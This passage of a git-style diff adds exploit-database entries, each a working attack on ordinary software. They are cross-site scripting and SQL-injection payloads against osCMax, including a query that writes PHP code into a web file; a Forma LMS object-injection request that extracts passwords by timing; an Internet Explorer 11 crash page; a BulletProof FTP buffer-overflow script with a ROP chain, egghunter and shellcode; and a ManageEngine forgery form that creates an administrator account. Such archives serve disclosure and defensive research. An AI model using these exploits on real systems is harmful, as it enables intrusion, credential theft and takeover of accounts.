in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

13
platforms/php/webapps/37038.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="'<script>alert(document.cookie);</script>">
<input type="hidden" name="password" value="">
<input type="submit" name="submit" value="Send">
</form>

16
platforms/php/webapps/37039.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/htaccess.php" method="post" name="main" id="main">
<input type="hidden" name="sb_id" value='"><script>alert(1);</script>'>
<input type="hidden" name="sb_key" value='"><script>alert(2);</script>'>
<input type="hidden" name="gc_id" value='"><script>alert(3);</script>'>
<input type="hidden" name="gc_key" value='"><script>alert(4);</script>'>
<input type="hidden" name="path" value='"><script>alert(5);</script>'>
<input type="submit" name="submit" value="Send">
</form>

9
platforms/php/webapps/37040.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

10
platforms/php/webapps/37041.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

9
platforms/php/webapps/37042.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E

9
platforms/php/webapps/37043.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E

9
platforms/php/webapps/37044.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E

9
platforms/php/webapps/37045.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E

9
platforms/php/webapps/37046.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E

13
platforms/php/webapps/37047.html Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="',1,2,(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))) -- 2">
<input type="hidden" name="password" value="">
<input type="submit" name="submit" value="Send">
</form>

9
platforms/php/webapps/37048.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52886/info
osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
osCMax 2.5.0 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'

56
platforms/php/webapps/37055.txt Executable file
View file

@ -0,0 +1,56 @@
Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities
[+] Author: Filippo Roncari
[+] Target: Forma LMS
[+] Version: 1.3 and probably lower
[+] Vendor: http://www.formalms.org
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf
[+] Info: f.roncari@securenetwork.it / f@unsec.it
[+] Summary
Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more.
[+] Vulnerability Details
Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities.
[+] Technical Details
See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details.
[+] Proof of Concept (PoC)
The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory.
[!] PoC Payload
----------------------------
a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";}
----------------------------
[!] PoC Request
----------------------------
POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1
Host: localhost
Cookie: docebo_session=91853e7eca413578de70304f94a43fe1
Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796
Content-Length: 1453
[...]
-----------------------------1657367614367103261183989796
Content-Disposition: form-data; name="message[recipients]"
a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D
[...]
--------------------------
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.

55
platforms/windows/dos/37060.html Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)

119
platforms/windows/local/37056.py Executable file
View file

@ -0,0 +1,119 @@
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
# Date: Feb 15 2015 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP SP3 English #
# Credits: His0k4 #
# CVE: CVE-2008-5753 #
#-----------------------------------------------------------------------------#
#!/usr/bin/python
from struct import pack
# offset to SEH is 93 byte
buf = b'A' * 13
buf += pack('<L',0x77c1f62f) # POP ECX # POP ECX # POP EDI # POP EBX # POP EBP # RETN [msvcrt.dll]
buf += b'A' * 20
buf += pack('<L',0x74c86a99) # POP ESI # RETN [oleacc.dll]
buf += b'A' * 4
buf += pack('<L',0x77c4dca8) # ADD ESP,2C # RETN [msvcrt.dll]
buf += b'A' * 18
buf += pack('<L',0x77c1c47f) # POP EBX # POP EBP # RETN 10 [msvcrt.dll]
buf += b'A' * 8
buf += pack('<L',0x74c86a9a) # RETN [oleacc.dll]
buf += b'A' * 10
buf += b'\xce\xc3\x40' # ADD ESP,400 # POP ESI # POP EBX # RETN [bpftpclient.exe]
# ROP chain
rop_gadgets = b''
rop_gadgets += pack('<L',0x77c364d5) # POP EBP # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c364d5) # skip 4 bytes [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xfffffafe) # Value to negate, will become 0x00000501
rop_gadgets += pack('<L',0x7ca82222) # NEG EAX # RETN [shell32.dll]
rop_gadgets += pack('<L',0x77227494) # XCHG EAX,EBX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0xffffffc0) # Value to negate, will become 0x00000040
rop_gadgets += pack('<L',0x771bcbe4) # NEG EAX # RETN [WININET.dll]
rop_gadgets += pack('<L',0x77f124c8) # XCHG EAX,EDX # RETN [GDI32.dll]
rop_gadgets += pack('<L',0x77c2c343) # POP ECX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c605b5) # &Writable location [msvcrt.dll]
rop_gadgets += pack('<L',0x77c23b47) # POP EDI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c39f92) # RETN (ROP NOP) [msvcrt.dll]
rop_gadgets += pack('<L',0x77c34d9a) # POP ESI # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c2aacc) # JMP [EAX] [msvcrt.dll]
rop_gadgets += pack('<L',0x77c21d16) # POP EAX # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c11120) # ptr to &VirtualProtect() [IAT msvcrt.dll]
rop_gadgets += pack('<L',0x77c12df9) # PUSHAD # RETN [msvcrt.dll]
rop_gadgets += pack('<L',0x77c35524) # ptr to 'push esp # ret ' [msvcrt.dll]
# heap-only egghunter
hunter = b'\x6a\x30\x5a' # PUSH 30 # POP EDX
hunter += b'\x64\x8b\x12' # MOV EDX, DWORD PTR FS:[EDX]
hunter += b'\x80\xc2\x90' # ADD DL,90
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\x8b\x12' # MOV EDX, DWORD PTR [EDX]
hunter += b'\xeb\x05' # JMP SHORT
hunter += b'\x66\x81\xca\xff\x0f' # OR DX,0FFF
hunter += b'\x42\x52' # INC EDX # PUSH EDX
hunter += b'\x6a\x02\x58' # PUSH 2 # POP EAX
hunter += b'\xcd\x2e' # INT 2E
hunter += b'\x3c\x05' # CMP AL,5
hunter += b'\x5a' # POP EDX
hunter += b'\x74\xef' # JE SHORT
hunter += b'\xb8\x77\x30\x30\x74' # MOV EAX, w00t
hunter += b'\x89\xd7' # MOV EDI,EDX
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xea' # JNZ SHORT
hunter += b'\xaf' # SCAS DWORD PTR ES:[EDI]
hunter += b'\x75\xe7' # JNZ SHORT
# copy shellcode back to stack
strcpy = b'\x8b\xec' # MOV EBP,ESP
strcpy += b'\x57\x55\x55' # PUSH EDI # PUSH EBP # PUSH EBP
strcpy += b'\x68\x30\x60\xc4\x77' # PUSH ptr to &strcpy [msvcrt.dll]
strcpy += b'\xc3' # RET
egg = 'w00t'.encode()
# msfvenom -p windows/exec -b '\x00\x0d\x0a\x1a' -e x86/shikata_ga_nai cmd=calc.exe
shellcode = b''
shellcode += b'\xdb\xd1\xb8\xda\x92\x2c\xca\xd9\x74\x24\xf4\x5a\x31'
shellcode += b'\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xce\x70'
shellcode += b'\xd9\x36\x06\xf6\x22\xc7\xd6\x97\xab\x22\xe7\x97\xc8'
shellcode += b'\x27\x57\x28\x9a\x6a\x5b\xc3\xce\x9e\xe8\xa1\xc6\x91'
shellcode += b'\x59\x0f\x31\x9f\x5a\x3c\x01\xbe\xd8\x3f\x56\x60\xe1'
shellcode += b'\x8f\xab\x61\x26\xed\x46\x33\xff\x79\xf4\xa4\x74\x37'
shellcode += b'\xc5\x4f\xc6\xd9\x4d\xb3\x9e\xd8\x7c\x62\x95\x82\x5e'
shellcode += b'\x84\x7a\xbf\xd6\x9e\x9f\xfa\xa1\x15\x6b\x70\x30\xfc'
shellcode += b'\xa2\x79\x9f\xc1\x0b\x88\xe1\x06\xab\x73\x94\x7e\xc8'
shellcode += b'\x0e\xaf\x44\xb3\xd4\x3a\x5f\x13\x9e\x9d\xbb\xa2\x73'
shellcode += b'\x7b\x4f\xa8\x38\x0f\x17\xac\xbf\xdc\x23\xc8\x34\xe3'
shellcode += b'\xe3\x59\x0e\xc0\x27\x02\xd4\x69\x71\xee\xbb\x96\x61'
shellcode += b'\x51\x63\x33\xe9\x7f\x70\x4e\xb0\x15\x87\xdc\xce\x5b'
shellcode += b'\x87\xde\xd0\xcb\xe0\xef\x5b\x84\x77\xf0\x89\xe1\x88'
shellcode += b'\xba\x90\x43\x01\x63\x41\xd6\x4c\x94\xbf\x14\x69\x17'
shellcode += b'\x4a\xe4\x8e\x07\x3f\xe1\xcb\x8f\xd3\x9b\x44\x7a\xd4'
shellcode += b'\x08\x64\xaf\xb7\xcf\xf6\x33\x16\x6a\x7f\xd1\x66'
identifier = b'This is a BulletProof FTP Client Session-File and should not be modified directly.'
host = buf
port = b'21'
name = b'B' + rop_gadgets + hunter + strcpy
password = b'bpfmcidchffddknejf'
local = egg + egg + shellcode
sploit = b"\r\n".join([identifier, host, port, name, password, local])
try:
print('[*] Creating exploit file...')
f = open('sploit.bps', 'wb')
f.write(sploit)
f.close()
print('[*] sploit.bps file successfully created!')
except:
print('[!] Error while creating exploit file!')

39
platforms/windows/webapps/37059.html Executable file
View file

@ -0,0 +1,39 @@
<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->
<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add&#32;User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>